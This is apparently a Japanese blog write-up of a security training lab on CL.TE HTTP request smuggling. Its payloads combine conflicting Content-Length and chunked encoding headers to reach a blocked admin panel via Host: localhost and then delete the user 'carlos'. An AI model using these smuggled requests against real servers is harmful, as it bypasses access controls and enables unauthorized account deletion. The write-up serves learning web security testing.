Shikata Ga Nai

Private? There is no such things.

Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerabilityをやってみた

Hello there, ('ω')ノ

 

HTTPリクエストの密輸を悪用して。

フロントエンドのセキュリティ制御をバイパスするCL.TEの脆弱性を。

 

このラボにはフロントエンドサーバとバックエンドサーバが含まれて。

フロントエンドサーバはチャンクエンコーディングをサポートしておらず。

管理パネルがあるが、フロントエンドサーバはアクセスをブロックするらしく。

 

まずは、ページにアクセスして。

 

f:id:ThisIsOne:20210427152506p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210427152611p:plain

 

adminを挿入してSendするとブロックされて。

 

f:id:ThisIsOne:20210427152645p:plain

 

Content-Lengthをオフにして。

リクエストメソッドをPOSTに変更して。

 

f:id:ThisIsOne:20210427152859p:plain

 

Hostヘッダ以下を下記に置き換えて、Sendすると。

ローカルユーザのみとのことで。

赤色がフロントエンドの範囲で。

 

Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked

 

0

 

GET /admin HTTP/1.1
X-Ignore: X

 

f:id:ThisIsOne:20210427153256p:plain

 

なので、下記を追加して二回ほどSendすると。

ようやく管理パネルにアクセスできて。

 Content-Length: 58

 

 Host: localhost

 

f:id:ThisIsOne:20210427175524p:plain

 

下記の内容に変更してSendして。

 Content-Length: 81

 

 GET /admin/delete?username=carlos

 

f:id:ThisIsOne:20210427180127p:plain


最後にFollowをクリックすると。

 

f:id:ThisIsOne:20210427180032p:plain


クリアできた。

 

f:id:ThisIsOne:20210427154300p:plain

 

Best regards, (^^ゞ